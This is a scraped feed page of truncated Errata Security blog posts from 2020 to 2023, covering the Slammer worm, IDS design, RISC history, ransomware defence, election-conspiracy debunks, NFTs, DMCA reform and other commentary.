What's new arround internet

Last one

Src Date (GMT) Titre Description Tags Stories Notes
ErrataRob.webp 2023-01-25 16:09:34 I\'m still bitter about Slammer (lien direct) Today is the 20th anniversary of the Slammer worm. I'm still angry over it, so I thought I'd write up my anger. This post will be of interest to nobody, it's just me venting my bitterness and get off my lawn!!Back in the day, I wrote "BlackICE", an intrusion detection and prevention system that ran as both a desktop version and a network appliance. Most cybersec people from that time remember it as the desktop version, but the bulk of our sales came from the network appliance.The network appliance competed against other IDSs at the time, such as Snort, an open-source product. For much the cybersec industry, IDS was Snort -- they had no knowledge of how intrusion-detection would work other than this product, because it was open-source.My intrusion-detection technology was radically different. The thing that makes me angry is that I couldn't explain the differences to the community because they weren't technical enough.When Slammer hit, Snort and Snort-like products failed. Mine succeeded extremely well. Yet, I didn't get the credit for this.The first difference is that I used a custom poll-mode driver instead of interrupts. This the now the norm in the industry, such as with Linux NAPI drivers. The problem with interrupts is that a computer could handle less than 50,000 interrupts-per-second. If network traffic arrived faster than this, then the computer would hang, spending all it's time in the interrupt handler doing no other useful work. By turning off interrupts and instead polling for packets, this problem is prevented. The cost is that if the computer isn't heavily loaded by network traffic, then polling causes wasted CPU and electrical power. Linux NAPI drivers switch between them, interrupts when traffic is light and polling when traffic is heavy.The consequence is that a typical machine of the time (dual Pentium IIIs) could handle 2-million packets-per-second running my software, far better than the 50,000 packets-per-second of the competitors.When Slammer hit, it filled a 1-gbps Ethernet with 300,000 packets-per-second. As a consequence, pretty much all other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2-million packets-per-second) was impossible, because everyone knew that computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better. Networks appliances are now written using these things. Now you'd expect something like Snort to keep up and not get overloaded with interrupts. What makes me bitter is that back then, this was inexplicable magic.I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this driver, if you want more info.The second difference with my product was how signatures were written. Everyone else used signatures that triggered on the pattern-matching. Instead, my technology included protocol-analysis, code that parsed more than 100 protocols.The difference is that when there is an exploit of a buffer-overflow vulnerability, pattern-matching searched for patterns unique to the exploit. In my case, we'd measure the length of the buffer, triggering when it exceeded a certain length, finding any attempt to attack the vulnerability.The reason we could do this was through the use of state-machine parsers. Such analysis was considered heavy-weight and slow, which is why others avoided it. State-machines are faster than pattern-matching, many times faster. Better and faster.Such parsers are no Vulnerability Guideline ★★
ErrataRob.webp 2022-10-23 16:05:58 The RISC Deprogrammer (lien direct) I should write up a larger technical document on this, but in the meanwhile is this short (-ish) blogpost. Everything you know about RISC is wrong. It's some weird nerd cult. Techies frequently mention RISC in conversation, with other techies nodding their head in agreement, but it's all wrong. Somehow everyone has been mind controlled to believe in wrong concepts.An example is this recent blogpost which starts out saying that "RISC is a set of design principles". No, it wasn't. Let's start from this sort of viewpoint to discuss this odd cult.What is RISC?Because of the march of Moore's Law, every year, more and more parts of a computer could be included onto a single chip. When chip densities reached the point where we could almost fit an entire computer on a chip, designers made tradeoffs, discarding unimportant stuff to make the fit happen. They made tradeoffs, deciding what needed to be included, what needed to change, and what needed to be discarded.RISC is a set of creative tradeoffs, meaningful at the time (early 1980s), but which were meaningless by the late 1990s.The interesting parts of CPU evolution are the three decades from 1964 with IBM's System/360 mainframe and 2007 with Apple's iPhone. The issue was a 32-bit core with memory-protection allowing isolation among different programs with virtual memory. These were real computers, from the modern perspective: real computers have at least 32-bit and an MMU (memory management unit).The year 1975 saw the release of Intel 8080 and MOS 6502, but these were 8-bit systems without memory protection. This was at the point of Moore's Law where we could get a useful CPU onto a single chip.In the year 1977 we saw DEC release it's VAX minicomputer, having a 32-bit CPU w/ MMU. Real computing had moved from insanely expensive mainframes filling entire rooms to less expensive devices that merely filled a rack. But the VAX was way too big to fit onto a chip at this time.The real interesting evolution of real computing happened in 1980 with Motorola's 68000 (aka. 68k) processor, essentially the first microprocessor that supported real computing.But this comes with caveats. Making microprocessor required creative work to decide what wasn't included. In the case of the 68k, it had only a 16-bit ALU. This meant adding two 32-bit registers required passing them twice through the ALU, adding each half separately. Because of this, many call the 68k a 16-bit rather than 32-bit microprocessor.More importantly, only the lower 24-bits of the registers were valid for memory addresses. Since it's memory addressing that makes a real computer "real", this is the more important measure. But 24-bits allows for 16-megabytes of memory, which is all that anybody could afford to include in a computer anyway. It was more than enough to run a real operating system like Unix. In contrast, 16-bit processors could only address 64-kilobytes of memory, and weren't really practical for real computing.The 68k didn't come with a MMU, but it allowed an extra MMU chip. Thus, the early 1980s saw an explosion of workstations and servers consisting of a 68k and an MMU. The most famous was Sun Microsystems launched in 1982, with their own custom designed MMU chip.Sun and its competitors transformed the industry running Unix. Many point to IBM's PC from 1982 as the transformative moment in computer history, but these were non-real 16-bit systems that struggled with more than 64k of memory. IBM PC computers wouldn't become real until 1993 with Microsoft's Windows NT, supporting full 32-bits, memory-protection, and pre-emptive multitasking.But except for Windows itself, the rest of computing is dominated by the Unix heritage. The phone in your hand, whether Android or iPhone, is a Unix compu Guideline Heritage
ErrataRob.webp 2022-07-03 19:02:22 DS620slim tiny home server (lien direct) In this blogpost, I describe the Synology DS620slim. Mostly these are notes for myself, so when I need to replace something in the future, I can remember how I built the system. It's a "NAS" (network attached storage) server that has six hot-swappable bays for 2.5 inch laptop drives.That's right, laptop 2.5 inch drives. It makes this a tiny server that you can hold in your hand.The purpose of a NAS is reliable storage. All disk drives eventually fail. If you stick a USB external drive on your desktop for backups, it'll eventually crash, losing any data on it. A failure is unlikely tomorrow, but a spinning disk will almost certainly fail some time in the next 10 years. If you want to keep things, like photos, for the rest of your life, you need to do something different.The solution is RAID, an array of redundant disks such that when one fails (or even two), you don't lose any data. You simply buy a new disk to replace the failed one and keep going. With occasional replacements (as failures happen) it can last decades. My older NAS is 10 years old and I've replaced all the disks, one slot replaced twice.This can be expensive. A NAS requires a separate box in addition to lots of drives. In my case, I'm spending $1500 for a 18-terabytes of disk space that would cost only $400 as an external USB drive. But amortized for the expected 10+ year lifespan, I'm paying $15/month for this home system.This unit is not just disk drives but also a server. Spending $500 just for a box to hold the drives is a bit expensive, but the advantage is that it's also a server that's powered on all the time. I can setup tasks to run on regular basis that would break if I tried to regularly run them on a laptop or desktop computer.There are lots of do-it-yourself solutions (like the Radaxa Taco carrier board for a Raspberry Pi 4 CM running Linux), but I'm choosing this solution because I want something that just works without any hassle, that's configured for exactly what I need. For example, eventually a disk will fail and I'll have to replace it, and I know now that this is something that will be effortless when it happens in the future, without having to relearn some arcane Linux commands that I've forgotten years ago.Despite this, I'm a geek who obsesses about things, so I'm still going to do possibly unnecessary things, like upgrading hardware: memory, network, and fan for an optimized system. Here are all the components of my system:$500 - DS620slim unit$1000 - 6x Seagate Barracuda 5TB 2.5 inch laptop drive (ST5000LM000)$100 - 2x Crucial 8GB DDR3 SODIMMs (CT2K102464BF186D)$30 - 2.5gbps Ethernet USB (CableCreation B07VNFLTLD)$15 - Noctua NF-A8 ULN ultra silent fan$360 - WD Elements 18TB USB drive (WDBWLG0180HBK-NESN) Ransomware Guideline
ErrataRob.webp 2021-10-24 19:46:46 Review: Dune (2021) (lien direct) One of the most important classic sci-fi stories is the book "Dune" from Frank Herbert. It was recently made into a movie. I thought I'd write a quick review.The summary is this: just read the book. It's a classic for a good reason, and you'll be missing a lot by not reading it.But the movie Dune (2021) movie is very good. The most important thing to know is see it in IMAX. IMAX is this huge screen technology that partly wraps around the viewer, and accompanied by huge speakers that overwhelm you with sound. If you watch it in some other format, what was visually stunning becomes merely very pretty.This is Villeneuve's trademark, which you can see in his other works, like his sequel to Bladerunner. The purpose is to marvel at the visuals in every scene. The story telling is just enough to hold the visuals together. I mean, he also seems to do a good job with the story telling, but it's just not the reason to go see the movie. (I can't tell -- I've read the book, so see the story differently than those of you who haven't).Beyond the story and visuals, many of the actor's performances were phenomenal. Javier Bardem's "Stilgar" character steals his scenes. Stellan Skarsgård exudes evil. The two character actors playing the mentats were each perfect. I found the lead character (Timothée Chalamet) a bit annoying, but simply because he is at this point in the story.Villeneuve's splits the book into two parts. This movie is only the first part. This presents a problem, because up until this point, the main character is just responding to events, not the hero who yet drives the events. It doesn't fit into the traditional Hollywood accounting model. I really want to see the second film even if the first part, released in the post-pandemic turmoil of the movie industry, doesn't perform well at the box office.In short, if you haven't read the books, I'm not sure how well you'll follow the storytelling. But the visuals (seen at IMAX scale) and the characters are so great that I'm pretty sure most people will enjoy the movie. And go see it on IMAX in order to get the second movie made!! Guideline
ErrataRob.webp 2021-10-13 23:33:07 Fact check: that "forensics" of the Mesa image is crazy (lien direct) Tina Peters, the elections clerk from Mesa County (Colorado) went rogue, creating a "disk-image" of the election server, and posting that image to the public Internet. Conspiracy theorists have been analyzing the disk-image trying to find anomalies supporting their conspiracy-theories. A recent example is this "forensics" report. In this blogpost, I debunk that report.I suppose calling somebody a "conspiracy theorist" is insulting, but there's three objective ways we can identify them as such.The first is when they use the logic "everything we can't explain is proof of the conspiracy". In other words, since there's no other rational explanation, the only remaining explanation is the conspiracy-theory. But there can be other possible explanations -- just ones unknown to the person because they aren't smart enough to understand them. We see that here: the person writing this report doesn't understand some basic concepts, like "airgapped" networks.This leads to the second way to recognize a conspiracy-theory, when it demands this one thing that'll clear things up. Here, it's demanding that a manual audit/recount of Mesa County be performed. But it won't satisfy them. The Maricopa audit in neighboring Colorado, whose recount found no fraud, didn't clear anything up -- it just found more anomalies demanding more explanation. It's like Obama's birth certificate. The reason he ignored demands to show it was that first, there was no serious question (even if born in Kenya, he'd still be a natural born citizen -- just like how Cruz was born in Canada and McCain in Panama), and second, showing the birth certificate wouldn't change anything at all, as they'd just claim it was fake. There is no possibility of showing a birth certificate that can be proven isn't fake.The third way to objectively identify a conspiracy theory is when they repeat objectively crazy things. In this case, they keep demanding that the 2020 election be "decertified". That's not a thing. There is no regulation or law where that can happen. The most you can hope for is to use this information to prosecute the fraudster, prosecute the elections clerk who didn't follow procedure, or convince legislators to change the rules for the next election. But there's just no way to change the results of the last election even if wide spread fraud is now proven.The document makes 6 individual claims. Let's debunk them one-by-one.#1 Data Integrity ViolationThe report tracks some logs on how some votes were counted. It concludes:If the reasons behind these findings cannot be adequately explained, then the county's election results are indeterminate and must be decertified.This neatly demonstrates two conditions I cited above. The analyst can't explain the anomaly not because something bad happened, but because they don't understand how Dominion's voting software works. This demand for an explanation is a common attribute of conspiracy theories -- the ignorant keep finding things they don't understand and demand somebody else explain them.Secondly, there's the claim that the election results must be "decertified". It's something that Trump and his supporters believe is a thing, that somehow the courts will overturn the past election and reinstate Trump. This isn't a rational claim. It's not how the courts or the law works or the Constitution works.#2 Intentional purging of Log FilesThis is the issue that convinced Tina Peters to go rogue, that the normal Dominion software update gets rid of all the old system-log files. She leaked two disk-images, before and after the update, to show the disappearance of system-logs. She believes this violates the law demanding the "election records" be preserved. She claims because o Guideline
ErrataRob.webp 2021-09-21 18:01:25 That Alfa-Trump Sussman indictment (lien direct) Five years ago, online magazine Slate broke a story about how DNS packets showed secret communications between Alfa Bank in Russia and the Trump Organization, proving a link that Trump denied. I was the only prominent tech expert that debunked this as just a conspiracy-theory[*][*][*].Last week, I was vindicated by the indictment of a lawyer involved, a Michael Sussman. It tells a story of where this data came from, and some problems with it.But we should first avoid reading too much into this indictment. It cherry picks data supporting its argument while excluding anything that disagrees with it. We see chat messages expressing doubt in the DNS data. If chat messages existed expressing confidence in the data, we wouldn't see them in the indictment.In addition, the indictment tries to make strong ties to the Hillary campaign and the Steele Dossier, but ultimately, it's weak. It looks to me like an outsider trying to ingratiated themselves with the Hillary campaign rather than there being part of a grand Clinton-lead conspiracy against Trump.With these caveats, we do see some important things about where the data came from.We see how Tech-Executive-1 used his position at cyber-security companies to search private data (namely, private DNS logs) to search for anything that might link Trump to somebody nefarious, including Russian banks. In other words, a link between Trump and Alfa bank wasn't something they accidentally found, it was one of the many thousands of links they looked for.Such a technique has been long known as a problem in science. If you cast the net wide enough, you are sure to find things that would otherwise be statistically unlikely. In other words, if you do hundreds of tests of hydroxychloroquine or invermectin on Covid-19, you are sure to find results that are so statistically unlikely that they wouldn't happen more than 1% of the time.If you search world-wide DNS logs, you are certain to find weird anomalies that you can't explain. Unexplained computer anomalies happen all the time, as every user of computers can tell you.We've seen from the start that the data was highly manipulated. It's likely that the data is real, that the DNS requests actually happened, but at the same time, it's been stripped of everything that might cast doubt on the data. In this indictment we see why: before the data was found the purpose was to smear Trump. The finders of the data don't want people to come to the best explanation, they want only explainations that hurt Trump.Trump had no control over the domain in question, trump-email.com. Instead, it was created by a hotel marketing firm they hired, Cendyne. It's Cendyne who put Trump's name in the domain. A broader collection of DNS information including Cendyne's other clients would show whether this was normal or not.In other words, a possible explanation of the data, hints of a Trump-Alfa connection, has always been the dishonesty of those who collected the data. The above indictment confirms they were at this level of dishonesty. It doesn't mean the DNS requests didn't happen, but that their anomalous nature can be created by deletion of explanatory data.Lastly, we see in this indictment the problem with "experts". Guideline
ErrataRob.webp 2021-07-14 20:49:05 Ransomware: Quis custodiet ipsos custodes (lien direct) Many claim that "ransomware" is due to cybersecurity failures. It's not really true. We are adequately protecting users and computers. The failure is in the inability of cybersecurity guardians to protect themselves. Ransomware doesn't make the news when it only accesses the files normal users have access to. The big ransomware news events happened because ransomware elevated itself to that of an "administrator" over the network, giving it access to all files, including online backups.Generic improvements in cybersecurity will help only a little, because they don't specifically address this problem. Likewise, blaming ransomware on how it breached perimeter defenses (phishing, patches, password reuse) will only produce marginal improvements. Ransomware solutions need to instead focus on looking at the typical human-operated ransomware killchain, identify how they typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and "segment" networks.I read a lot of lazy op-eds on ransomware. Most of them claim that the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "do better at basic cyber hygiene". These are "unfalsifiable" -- things that nobody would disagree with, meaning they are things the speaker doesn't really have to defend. They don't rest upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms.Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there no way to tell if you aren't already doing such things, or the gap you need to overcome to reach this standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics.In this post, I try to focus on specifics, while at the same time, making sure things are broadly applicable. It's detailed enough that people will disagree with my solutions.The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they are able to cause such devastation, able to reach all the files in the network, while also being able to delete backups.The Kaseya attacks highlight this particularly well. The company produces a product that is in turn used by "Managed Security Providers" (MSPs) to administer the security of small and medium sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control of over 1000 small and medium sized businesses around the world.The underlying problems start with the way their software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning, with the standard vulnerabilities that most software has (such as "SQL injection"). It wasn't written in a paranoid, careful way that you'd hope for software that poses this much danger.A good analogy is airplanes. A common joke refers to the "black box" flight-recorders that survive airplane crashes, that maybe we should make the entire airplane out of that material. The reason we can't do this is that airplanes would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia knowing that bugs can l Ransomware Vulnerability Guideline
ErrataRob.webp 2021-04-29 04:15:50 Anatomy of how you get pwned (lien direct) Today, somebody had a problem: they kept seeing a popup on their screen, and obvious scam trying to sell them McAfee anti-virus. Where was this coming from?In this blogpost, I follow this rabbit hole on down. It starts with "search engine optimization" links and leads to an entire industry of tricks, scams, exploiting popups, trying to infect your machine with viruses, and stealing emails or credit card numbers.Evidence of the attack first appeared with occasional popups like the following. The popup isn't part of any webpage.This is obviously a trick. But from where? How did it "get on the machine"?There's lots of possible answers. But the most obvious answer (to most people), that your machine is infected with a virus, is likely wrong. Viruses are generally silent, doing evil things in the background. When you see something like this, you aren't infected ... yet.Instead, things popping with warnings is almost entirely due to evil websites. But that's confusing, since this popup doesn't appear within a web page. It's off to one side of the screen, nowhere near the web browser.Moreover, we spent some time diagnosing this. We restarted the webbrowser in "troubleshooting mode" with all extensions disabled and went to a clean website like Twitter. The popup still kept happening.As it turns out, he had another windows with Firefox running under a different profile. So while he cleaned out everything in this one profile, he wasn't aware the other one was still runningThis happens a lot in investigations. We first rule out the obvious things, and then struggle to find the less obvious explanation -- when it was the obvious thing all along.In this case, the reason the popup wasn't attached to a browser window is because it's a new type of popup notification that's suppose to act more like an app and less like a web page. It has a hidden web page underneath called a "service worker", so the popups keep happening when you think the webpage is closed.Once we figured the mistake of the other Firefox profile, we quickly tracked this down and saw that indeed, it was in the Notification list with Permissions set to Allow. Simply changing this solved the problem.Note that the above picture of the popup has a little wheel in the lower right. We are taught not to click on dangerous thing, so the user in this case was avoiding it. However, had the user clicked on it, it wouldn't led him straight here to the solution. Though, I can't recommend you click on such a thing and trust it, because that means in the future, malicious tricks will contain such safe looking icons that aren't so safe.Anyway, the next question is: which website did this come from?The answer is Google.In the news today was the story of the Michigan guys who tried to kidnap the governor. The user googled "attempted kidnap sentencing guidelines". This search produced a pa Guideline
ErrataRob.webp 2021-03-20 23:52:47 Deconstructing that $69million NFT (lien direct) "NFTs" have hit the mainstream news with the sale of an NFT based digital artwork for $69 million. I thought I'd write up an explainer. Specifically, I deconstruct that huge purchase and show what actually was exchanged, down to the raw code. (The answer: almost nothing).The reason for this post is that every other description of NFTs describe what they pretend to be. In this blogpost, I drill down on what they actually are.Note that this example is about "NFT artwork", the thing that's been in the news. There are other uses of NFTs, which work very differently than what's shown here.tl;drI have long bit of text explaining things. Here is the short form that allows you to drill down to the individual pieces.Beeple created a piece of art in a fileHe created a hash that uniquely, and unhackably, identified that fileHe created a metadata file that included the hash to the artworkHe created a hash to the metadata fileHe uploaded both files (metadata and artwork) to the IPFS darknet decentralized file sharing serviceHe created, or minted a token governed by the MakersTokenV2 smart contract on the Ethereum blockchainChristies created an auction for this tokenThe auction was concluded with a payment of $69 million worth of Ether cryptocurrency. However, nobody has been able to find this payment on the Ethereum blockchain, the money was probably transferred through some private means.Beeple transferred the token to the winner, who transferred it again to this final Metakovan accountEach of the link above allows you to drill down to exactly what's happening on the blockchain. The rest of this post discusses things in long form.Why do I care?Well, you don't. It makes you feel stupid that you haven't heard about it, when everyone is suddenly talking about it as if it's been a thing for a long time. But the reality, they didn't know what it was a month ago, either. Here is the Google Trends graph to prove this point -- interest has only exploded in the last couple months:The same applies to me. I've been aware of them (since the CryptoKitties craze from a couple years ago) but haven't invested time reading source code until now. Much of this blogpost is written as notes as I discover for myself exactly what was purchased fo Tool Guideline
ErrataRob.webp 2021-02-27 00:03:27 Review: Perlroth\'s book on the cyberarms market (lien direct) New York Times reporter Nicole Perlroth has written a book on zero-days and nation-state hacking entitled “This Is How They Tell Me The World Ends”. Here is my review.I'm not sure what the book intends to be. The blurbs from the publisher implies a work of investigative journalism, in which case it's full of unforgivable factual errors. However, it reads more like a memoir, in which case errors are to be expected/forgivable, with content often from memory rather than rigorously fact checked notes.But even with this more lenient interpretation, there are important flaws that should be pointed out. For example, the book claims the Saudi's hacked Bezos with a zero-day. I claim that's bunk. The book claims zero-days are “God mode” compared to other hacking techniques, I claim they are no better than the alternatives, usually worse, and rarely used. Ransomware Guideline
ErrataRob.webp 2020-12-09 15:25:45 The deal with DMCA 1201 reform (lien direct) There are two fights in Congress now against the DMCA, the "Digital Millennium Copyright Act". One is over Section 512 covering "takedowns" on the web. The other is over Section 1201 covering "reverse engineering", which weakens cybersecurity.Even before digital computers, since the 1880s, an important principle of cybersecurity has been openness and transparency ("Kerckhoff's Principle"). Only through making details public can security flaws be found, discussed, and fixed. This includes reverse-engineering to search for flaws.Cybersecurity experts have long struggled against the ignorant who hold the naive belief we should instead coverup information, so that evildoers cannot find and exploit flaws. Surely, they believe, given just anybody access to critical details of our security weakens it. The ignorant have little faith in technology, that it can be made secure. They have more faith in government's ability to control information.Technologists believe this information coverup hinders well-meaning people and protects the incompetent from embarrassment. When you hide information about how something works, you prevent people on your own side from discovering and fixing flaws. It also means that you can't hold those accountable for their security, since it's impossible to notice security flaws until after they've been exploited. At the same time, the information coverup does not do much to stop evildoers. Technology can work, it can be perfected, but only if we can search for flaws.It seems counterintuitive the revealing your encryption algorithms to your enemy is the best way to secure them, but history has proven time and again that this is indeed true. Encryption algorithms your enemy cannot see are insecure. The same is true of the rest of cybersecurity.Today, I'm composing and posting this blogpost securely from a public WiFi hotspot because the technology is secure. It's secure because of two decades of security researchers finding flaws in WiFi, publishing them, and getting them fixed.Yet in the year 1998, ignorance prevailed with the "Digital Millennium Copyright Act". Section 1201 makes reverse-engineering illegal. It attempts to secure copyright not through strong technological means, but by the heavy hand of government punishment.The law was not completely ignorant. It includes an exception allow what it calls "security testing" -- in theory. But that exception does not work in practice, imposing too many conditions on such research to be workable.The U.S. Copyright Office has authority under the law to add its own exemptions every 3 years. It has repeatedly added exceptions for security research, but the process is unsatisfactory. It's a protracted political battle every 3 years to get the exception back on the list, and each time it can change slightly. These exemptions are still less than what we want. This causes a chilling effect on permissible research. It would be better if such exceptions were put directly into the law.You can understand the nature of the debate by looking at those on each side.Those lobbying for the exceptions are those trying to make technology more secure, such as Rapid7, Bugcrowd, Duo Security, Luta Security, and Hackerone. These organizations have no interest in violating copyright -- their only concern is cybersecurity, finding and fixing flaws.The opposing side includes the copyright industry, as you'd expect, such as the "DVD" association who doesn't want hackers breaking the DRM on DVDs.However, much of the opposing side has nothing do with copyright as such.This notably includes the three major voting machine suppliers in the United States: Dominion Voting, ES&S, and Hart InterCivic. Security professionals have been pointing out security flaws in their equipment for the past several years. These vendors are explicitly trying to coverup their security flaws by using the law to silence critics.This goes back to the struggle mentioned at the top of this Guideline
ErrataRob.webp 2020-10-25 21:05:55 Why Biden: Principle over Party (lien direct) There exist many #NeverTrump Republicans who agree that while Trump would best achieve their Party's policies, that he must nonetheless be opposed on Principle. The Principle at question isn't that Trump is a liar, a misogynist, a racist, or of low character (though all these are true). Instead, the Principle is that he's a populist autocrat who is eroding our liberal institutions ("liberal" as in the classic sense).Countries don't fail when there's a leftward shift in government policies. Many prosperous, peaceful European countries are to the left of Biden. What makes prosperous countries fail is when civic institutions break down, when a party or dear leader starts ruling by decree, such as in the European countries of Russia or Hungary.Our system of government is like football. While the teams (parties) compete vigorously against each other, they largely respect the rules of the game, both written and unwritten traditions. They respect each other -- while doing their best to win (according to the rules), they nonetheless shake hands at the end of the match, and agree that their opponents are legitimate.The rules of the sport we are playing is described in the Wikipedia page on "liberal democracy".Sport matches can be enjoyable even if you don't understand the rules. The same is true of liberal democracy: there's little civic education in the country so most don't know the rules game. Most are unaware even that there are rules.You see that in action with this concern over Trump conceding the election, his unwillingness to commit to a "peaceful transfer of power". His supporters widely believed this is a made-up controversy, a "principle" created on the spot as just another way to criticize Trump.But it's not a new principle. A "peaceful transfer of power" is the #1 bedrock principles from which everything else derives. It's the first way we measure whether a country is actually the "liberal democracy" that they claim. For example, the fact that Putin has been in power for 20 years makes us doubt that they are really the "liberal democracy" that they claim. The reason you haven't heard of it, the reason it isn't discussed much, is that it's so unthinkable that a politician would reject it the way Trump has.The historic importance of this principle can be seen when you go back and read the concession speeches of HillaryMcCainGore, and Bush Sr., and Carter, you see that all of them stressed the legitimacy of their opponent's win, and a commitment to a peaceful transfer of power. (It goes back further than that, to the founding of our country, but I can't link every speech). The following quote from Hillary's concession to Trump demonstrates this principle:But I still believe in America and I always will. And if you do, then we must accept this result and then look to the future. Donald Trump is going to be our president. We owe him an open mind and the chance to lead.Our constitutional democracy enshrines the peaceful transfer of power and we don't just respect that, we cherish it. It also enshrines other things; the rule of law, the principle that we are all equal in rights and dignity, freedom of worship and expression. We respect and cherish these values too and we must defend them.If this were Trump's only failure, then we could excuse it and work around it. As long as he defended all Guideline
ErrataRob.webp 2020-10-14 19:34:25 Yes, we can validate leaked emails (lien direct) When emails leak, we can know whether they are authenticate or forged. It's the first question we should ask of today's leak of emails of Hunter Biden. It has a definitive answer.Today's emails have "cryptographic signatures" inside the metadata. Such signatures have been common for the past decade as one way of controlling spam, to verify the sender is who they claim to be. These signatures verify not only the sender, but also that the contents have not been altered. In other words, it authenticates the document, who sent it, and when it was sent.Crypto works. The only way to bypass these signatures is to hack into the servers. In other words, when we see a 6 year old message with a valid Gmail signature, we know either (a) it's valid or (b) they hacked into Gmail to steal the signing key. Since (b) is extremely unlikely, and if they could hack Google, they could a ton more important stuff with the information, we have to assume (a).Your email client normally hides this metadata from you, because it's boring and humans rarely want to see it. But it's still there in the original email document. An email message is simply a text document consisting of metadata followed by the message contents.It takes no special skills to see metadata. If the person has enough skill to export the email to a PDF document, they have enough skill to export the email source. If they can upload the PDF to Scribd (as in the story), they can upload the email source. I show how to below.To show how this works, I send an email using Gmail to my private email server (from gmail.com to robertgraham.com).The NYPost story shows the email printed as a PDF document. Thus, I do the same thing when the email arrives on my MacBook, using the Apple "Mail" app. It looks like the following:The "raw" form originally sent from my Gmail account is simply a text document that looked like the following:This is rather simple. Client's insert details like a "Message-ID" that humans don't care about. There's also internal formatting details, like the fact that this is a "plain text" message rather than an "HTML" email.But this raw document was the one sent by the Gmail web client. It then passed through Gmail's servers, then was passed across the Internet to my private server, where I finally retrieved it using my MacBook.As email messages pass through servers, the servers add their own metadata.When it arrived, the "raw" document looked like the following. None of the important bits changed, but a lot more metadata was added: Hack Guideline
ErrataRob.webp 2020-10-08 21:44:25 Factcheck: Regeneron\'s use of embryonic stem cells (lien direct) This week, Trump's opponents misunderstood a Regeneron press release to conclude that the REG-COV2 treatment (which may have saved his life) was created from stem cells. When that was proven false, his opponents nonetheless deliberately misinterpreted events to conclude there was still an ethical paradox. I've read the scientific papers and it seems like this is an issue that can be understood with basic high-school science, so I thought I'd write up a detailed discussion.The short answer is this:The drug is not manufactured in any way from human embryonic tissues.The drug was tested using fetal/embryonic cells, but ones almost 50 years old, not new ones.Republicans want to stop using new embryos, the ethical issue here is the continued use of old embryos, which Republican have consistently agreed to.Yes, the drug is still tainted by the "embryonic stem cell" issue -- just not in any of the ways that people claim it is, and not in a way that makes Republicans inconsistent.Almost all medical advances of the last few decades are similarly tainted.Now let's do the long, complicated answer. This starts with a discussion of the science of Regeneron's REG-COV2 treatment.A well-known treatment that goes back decades is to take blood plasma from a recently recovered patient and give it to a recently infected patient. Blood plasma is where the blood cells are removed, leaving behind water, salts, other particles, and most importantly, "antibodies". This is the technical concept behind the movie "Outbreak", though of course they completely distort the science.Antibodies are produced by the immune system to recognize and latch onto foreign things, including viruses (the rest of this discussion assumes "viruses"). They either deactivate the virus particle, or mark it to be destroyed by other parts of the immune system, or both.After an initial infection, it takes a while for the body to produce antibodies, allowing the disease to rage unchecked. A massive injection of antibodies during this time allows the disease to be stopped before it gets very far, letting the body's own defenses catch up. That's the premise behind Trump's treatment.An alternative to harvesting natural antibodies from recently recovered patients is to manufacture artificial antibodies using modern science. That's what Regeneron did.An antibody is just another "protein", the building blocks of the body. The protein is in the shape of a Y with the two upper tips formed to lock onto the corresponding parts of a virus ("antigens"). Every new virus requires a new antibody with different tips.The SARS-COV-2 virus has these "spike" proteins on it's surface that allow it to invade the cells in our lungs. They act like a crowbar, jamming themselves into the cell wall, then opening up a hole to allow the rest of the virus inside. Since this is the important and unique prote Guideline
ErrataRob.webp 2020-07-19 17:07:57 How CEOs think (lien direct) Recently, Twitter was hacked. CEOs who read about this in the news ask how they can protect themselves from similar threats. The following tweet expresses our frustration with CEOs, that they don't listen to their own people, but instead want to buy a magic pill (a product) or listen to outside consultants (like Gartner). In this post, I describe how CEOs actually think.CEO : "I read about that Twitter hack. Can that happen to us?"Security : "Yes, but ..."CEO : "What products can we buy to prevent this?"Security : "But ..."CEO : "Let's call Gartner."*sobbing sounds*- Wim Remes (@wimremes) July 16, 2020The only thing more broken than how CEOs view cybersecurity is how cybersecurity experts view cybersecurity. We have this flawed view that cybersecurity is a moral imperative, that it's an aim by itself. We are convinced that people are wrong for not taking security seriously. This isn't true. Security isn't a moral issue but simple cost vs. benefits, risk vs. rewards. Taking risks is more often the correct answer rather than having more security.Rather than experts dispensing unbiased advice, we've become advocates/activists, trying to convince people that they need to do more to secure things. This activism has destroyed our credibility in the boardroom. Nobody thinks we are honest.Most of our advice is actually internal political battles. CEOs trust outside consultants mostly because outsiders don't have a stake in internal politics. Thus, the consultant can say the same thing as what you say, but be trusted.CEOs view cybersecurity the same way they view everything else about building the business, from investment in office buildings, to capital equipment, to HR policies, to marketing programs, to telephone infrastructure, to law firms, to .... everything.They divide their business into two parts:The first is the part they do well, the thing they are experts at, the things that define who they are as a company, their competitive advantage.The second is everything else, the things they don't understand.For the second part, they just want to be average in their industry, or at best, slightly above average. They want their manufacturing costs to be about average. They want the salaries paid to employees to be about average. They want the same video conferencing system as everybody else. Everything outside of core competency is average.I can't express this enough: if it's not their core competency, then they don't want to excel at it. Excelling at a thing comes with a price. They have to pay people more. They have to find the leaders with proven track records at excelling at it. They have to manage excellence.This goes all the way to the top. If it's something the company is going to excel at, then the CEO at the top has to have enough expertise themselves to understand who the best leaders to can accomplish this goal. The CEO can't hire an excellent CSO unless they have enough competency to judge the qualifications of the CSO, and enough competency to hold the CSO accountable for the job they are doing.All this is a tradeoff. A focus of attention on one part of the business means less attention on other parts of the business. If your company excels at cybersecurity, it means not excelling at some other part of the business.So unless you are a company like Google, whose cybersecurity is a competitive advantage, you don't want to excel in cybersecurity. You want to be Ransomware Guideline NotPetya
